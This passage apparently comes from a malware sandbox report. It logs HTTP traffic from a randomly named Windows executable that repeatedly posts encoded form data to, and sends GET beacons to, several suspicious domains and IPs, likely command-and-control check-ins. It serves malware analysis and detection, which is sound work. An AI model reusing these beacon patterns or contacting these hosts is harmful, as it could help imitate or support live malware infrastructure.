                                                                                          Data Ascii: T4OdNH=HYEt2Ef9g7o++kmbt48SehvRoy4FlkWwkfI1lKTF96MnM1SJ1HedZeLg8sgbKFILVEWJtZeqM+XlWatV1BwlzTrbOIZSnGcvxzPjV0tMA+L14njVGp7Rz3vA94ktGy/y8nIdR/3tHU0vygy5n/O2gXYrR+BWpgy3jpfmmb8PUUspgqGsb8AotGV33MvLS7VGAFFC3yPhJ022
                                                                                          Jan 8, 2025 15:00:20.489952087 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:20 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaU4ivDhT3Zk%2F51rHf1hPzSr4Fak1GDP482%2BlcL63VV8jGbPRNV6RNT%2BcDUzDQSD%2F9jAxGByox3KXcVHsRaltKQ3bTQgyHvD4ZU5YoHTdxYGxfD92mHkYcT5HTg4ucjsFsT%2B"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6945e944352-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          10 | 192.168.2.6 | 49986 | 104.21.53.168 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:22.138329983 CET | 790 | OUT | POST /qc6u/ HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.neoparty.sbs
                                                                                          Referer: http://www.neoparty.sbs/qc6u/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=HYEt2Ef9g7o+/EWboZ8SJRvekS4F3kW0kf01lPqe8McnMXaJyGedeeLgocgDOFIVVEb6tZSqM47lWZ5V1wwkzDrdFoZQpmcvxzPjV04ZA/j15UrVUY7QtHvD+4ktXi/+8nIvR6WKHS4vylO5ntm1rXYpJeAhpw/Ag6+2oIsFUWIahcb2HPAL/W113O35SbVsCF9CllDGGATVzxlCDPS+jQpSk9MVumvWmQ==
                                                                                          Jan 8, 2025 15:00:23.116576910 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:23 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcRaYP8bJSkzgoPI9TPBNaZcrk9W%2FZKNpXuxNTWl61TLdRYaAlytSwhXAF4Z1UGZ4AQoS14pJwZ7j14t735VNo3AYRSHq1gVrGN3mM2JlWx1XkIQzkySW3BdENsnuAHJrEUv"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6a4dd968c36-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          11 | 192.168.2.6 | 49987 | 104.21.53.168 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:24.685410023 CET | 1803 | OUT | POST /qc6u/ HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.neoparty.sbs
                                                                                          Referer: http://www.neoparty.sbs/qc6u/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:25.668557882 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:25 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dA%2FAZWuktk9Vvgk7sfckn0q1xxlnfdMsRdX%2FMLqDbMeTMoHkMWImAW%2BD7VL2vAW6Je6m8uEgq0yWxmWQ%2Bi%2FcZ8aF9yiQ7%2BXyiIfxGytkl%2FNBIxacab83Px%2B8U%2B30GraM9wxK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6b4cb400f68-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1481&rtt_var=740&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          12 | 192.168.2.6 | 49988 | 104.21.53.168 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:27.226830959 CET | 513 | OUT | GET /qc6u/?T4OdNH=KasN1xnr6qxo50+siIN0KAfRtD0D1F2Xjd0YqYDU3pURb3uX+HWLUZelx9Jnej1VJkKFsqm6fN7HUYc3wzos1lmCBt8frBU6tWvEY3xAPNLu5kbYSa6DvHLcvpdXX1zJ5HhRaag=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:28.199692011 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:00:28 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jUdTiXa%2FTlIMs2OPDEwD2jTHEdmRyAzvYleTLMiJLtrQ6vv9ud41Kefx9QaFLyoSDH2nlHcKsLEPEP9SbUwFckmuFYWdYP9%2BEo82neC9Sr2ZRUqp7aefTiKYOMahMmu6qzI"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fecb6c4ae8f4408-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=513&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans
                                                                                          Jan 8, 2025 15:00:28.199707985 CET | 457 | IN
                                                                                          Data Ascii: -serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:1


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          13 | 192.168.2.6 | 49989 | 199.59.243.228 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:00:41.396032095 CET | 769 | OUT | POST /m5bf/ HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.deadshoy.tech
                                                                                          Referer: http://www.deadshoy.tech/m5bf/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=IIz8wtvsy8sQDhAxjRr7FzQLaYksnZ5moIBwlbPIq9gZ0MSnWQaU3ibkVNQ+ilcvuvy8N2vX0gu0mRAwr0etHvQFM6PsQ2Nyqc46VXybDu5tz9C7PbtSHYWtYm25r4g5ufpeD0te9Hv5OnhXMQM1k0BZr9mP/I3ZsfuukaikR2H/uulvKsuFLM3Z6oXQxxJHNUkzrcu+wsxR
Jan 8, 2025 15:00:41.857542992 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:41 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1118
                                                                                          x-request-id: 66005974-c4de-4433-ad31-d3c07f856ebf
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==
                                                                                          set-cookie: parking_session=66005974-c4de-4433-ad31-d3c07f856ebf; expires=Wed, 08 Jan 2025 14:15:41 GMT; path=/
                                                                                          connection: close
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 8, 2025 15:00:41.857562065 CET | 571 | IN
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjYwMDU5NzQtYzRkZS00NDMzLWFkMzEtZDNjMDdmODU2ZWJmIiwicGFnZV90aW1lIjoxNzM2MzQ0OD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49990 | 199.59.243.228 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 15:00:43.939471960 CET | 793 | OUT | POST /m5bf/ HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.deadshoy.tech
                                                                                          Referer: http://www.deadshoy.tech/m5bf/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=IIz8wtvsy8sQAAwxkyz7QDQEfYks+J4voI9wlZjmqvEZ6MinXSyUwibketQx8VcouvvPN2jX0gS0mUswrDiuG/QDXKPqPmNyqc46VXO1DuhtzMy7O6tTZIWqO225gYgiufp8Dwt49Cj5OiFXMBM69EBf1Nn5+pSqteLTk6yZGF6Zi441WfumZcXb6qPixRJtPUcz5LiZ/YUy4QblszV1GuDRgEc4DzvTow==
Jan 8, 2025 15:00:44.388211012 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:43 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1118
                                                                                          x-request-id: 44af6101-67c6-49b2-bccb-0868e94dfbf4
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==
                                                                                          set-cookie: parking_session=44af6101-67c6-49b2-bccb-0868e94dfbf4; expires=Wed, 08 Jan 2025 14:15:44 GMT; path=/
                                                                                          connection: close
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 8, 2025 15:00:44.388228893 CET | 571 | IN
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDRhZjYxMDEtNjdjNi00OWIyLWJjY2ItMDg2OGU5NGRmYmY0IiwicGFnZV90aW1lIjoxNzM2MzQ0OD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49991 | 199.59.243.228 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 15:00:46.489474058 CET | 1806 | OUT | POST /m5bf/ HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.deadshoy.tech
                                                                                          Referer: http://www.deadshoy.tech/m5bf/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
Data Ascii: T4OdNH= [TRUNCATED]
Jan 8, 2025 15:00:46.931845903 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:46 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1118
                                                                                          x-request-id: 9aa92100-839c-46f0-9ca4-07e70b4d53c6
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==
                                                                                          set-cookie: parking_session=9aa92100-839c-46f0-9ca4-07e70b4d53c6; expires=Wed, 08 Jan 2025 14:15:46 GMT; path=/
                                                                                          connection: close
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 8, 2025 15:00:46.931864023 CET | 571 | IN
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWFhOTIxMDAtODM5Yy00NmYwLTljYTQtMDdlNzBiNGQ1M2M2IiwicGFnZV90aW1lIjoxNzM2MzQ0OD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49992 | 199.59.243.228 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 15:00:49.029521942 CET | 514 | OUT | GET /m5bf/?T4OdNH=FKbczbLQ0sosfCA1qCrPSRQ7VsQywqY/pLAdnJ/+09co5PW+cyiO7Vblbf5B8jAN4N3DOHH6+lmh0DtSmFnRLbtcPKmyFQ0Njr8nYR2PceIb1tebNbsHFqS/Z3HN1OVssaooHgA=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
Jan 8, 2025 15:00:49.481997013 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:49 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1518
                                                                                          x-request-id: fb7c4325-a793-4422-8f0a-4ca58a3e1276
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GKzPqV3Jhx4QzVCgNT3YpMNmC9vuBKbd4eQsrLtqONbfiIOM6FauXKA5n+n7RcElahZizuDELu6Yk+ABa2vV7g==
                                                                                          set-cookie: parking_session=fb7c4325-a793-4422-8f0a-4ca58a3e1276; expires=Wed, 08 Jan 2025 14:15:49 GMT; path=/
                                                                                          connection: close
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GKzPqV3Jhx4QzVCgNT3YpMNmC9vuBKbd4eQsrLtqONbfiIOM6FauXKA5n+n7RcElahZizuDELu6Yk+ABa2vV7g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 8, 2025 15:00:49.482013941 CET | 971 | IN
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmI3YzQzMjUtYTc5My00NDIyLThmMGEtNGNhNThhM2UxMjc2IiwicGFnZV90aW1lIjoxNzM2MzQ0OD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49993 | 194.58.112.174 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 15:01:02.899338961 CET | 787 | OUT | POST /9bhq/ HTTP/1.1
                                                                                          Host: www.mosorehlable.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.mosorehlable.online
                                                                                          Referer: http://www.mosorehlable.online/9bhq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=J3i2MFWyF77UZ4PRORiumgBiM6y8eEN7NdoYazPbHEfhV2FT7fZAY44Lg7J0CEKVEaLoJcUHOuS2pSQM11ZHoj2dzTrgNGdvcLK9uX/ElcPRMmtXKRN0M6DCME2hZMXzxT08TfSCu0A3J14EAxdN+BQh+B/dI7tS9XeUDQnYYlv9dkbja2tF4wSKfRbqhJ4OWDUNigylE04O
Jan 8, 2025 15:01:03.479429007 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:01:03 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
Jan 8, 2025 15:01:03.479451895 CET | 1236 | IN
                                                                                          Data Ascii: &HN_@Z"ndQ{'w)>VN8nk}IS-R";:gp)l*t;w-huZ-`4)O|ge !.>,re`zq*wJ'Cx; "
                                                                                          Jan 8, 2025 15:01:03.479465961 CET1201INData Raw: 91 2d f9 05 80 6a 61 6f 4c a7 69 4b 1b 63 7a 98 35 c5 72 ae 2e e7 23 00 e0 6b 68 06 6d 1b e7 d0 16 4e ec b3 d3 ea bc 51 d6 c7 d6 27 4e 9f bf 25 15 93 b2 a0 26 e8 8d 4e 4a 1f 91 85 d9 4c 68 ea 29 51 2f 6d 5e 57 31 c5 e7 7a 9a 1d 00 74 df c3 e9 68
                                                                                          Data Ascii: -jaoLiKcz5r.#khmNQ'N%&NJLh)Q/m^W1ztho9radZq8`Y:P*X,=HO*>WWOypaeU-eUv;2SvJ~7~8II4?P86f:sYHgW}Wmq`nr5,n


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          18 | 192.168.2.6 | 49994 | 194.58.112.174 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:05.739631891 CET | 811 | OUT | POST /9bhq/ HTTP/1.1
                                                                                          Host: www.mosorehlable.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.mosorehlable.online
                                                                                          Referer: http://www.mosorehlable.online/9bhq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
